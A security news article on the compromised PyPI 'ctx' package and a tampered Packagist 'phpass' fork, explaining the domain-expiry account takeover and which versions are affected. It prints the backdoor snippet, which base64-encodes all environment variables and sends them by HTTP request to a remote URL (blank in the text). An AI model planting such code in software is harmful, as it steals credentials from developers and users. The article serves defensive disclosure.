Python CTX and PHP Library Compromised to Steal AWS Credentials

PyPI and PHP libraries to Steal AWS Credentials

Python CTX Libary Compromised with AWS Credentials Stealer

One of the popular packages of Python programming language of Python Package Index, named "ctx Python" seemed to be compromised and was injected with a backdoor. 

Just a few hours ago, Reddit users found that the package got the update version 0.2.6, which had not received any update in the last 8 years, and also this release came after skipping a few releases too. A weird thing that came up was the update was reflected on the GitHub repo. 

Upon digging into the source code of the latest release users found an interesting code :

def __init__(self):
    .  # code that performs dict access
    .  # please DO NOT RUN THIS CODE !

     def sendRequest(self):
        string = ""
        for _, value in environ.items():
            string += value+" "

        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')

        response = requests.get(""+base64_message)

From the above code, it seems like every time you create a dictionary it sends all your environment variables to a URL. The malicious code sends all the environment variables to a Heroku app URL.

It clearly shows that the current Python ctx package (which as got updated on May 21 and after) on should not be used as it has been tampered with. 

Additionally, versions of a 'phpass' fork published to the PHP/Composer package repository Packagist had been tampered with in the same way. PHPass has been downloaded 2.5 million times.

If one was using the original version 0.1.2 (SHA1 hash of ed9ef913ee7d4044992142306038c8a647b00b77) that was installed prior to sometime before May 14, 2022, it is unlikely that you would be using the tampered version of ctx (note that version 0.2.2 was uploaded on May 14, 2022). However, if one had installed the ctx package after May 14, 2022, you would likely be running an unsafe version of the ctx Python package.

Another post at Infosec handler diary blogs has written about the issue and updated the post with the following -

"It appears that the original maintainer's domain name had expired, and the perpetrator registered it on May 14, 2022 (the same date where version 0.2.2 of ctx was uploaded). With control over the original domain name, creating a corresponding e-mail to receive a password reset e-mail would be trivial. After gaining access to the account, the perpetrator could remove the old package and upload the new backdoored versions."

In the meantime, the official page of the ctx project at PyPI has been removed showing the not found error. 

Read Also
Post a Comment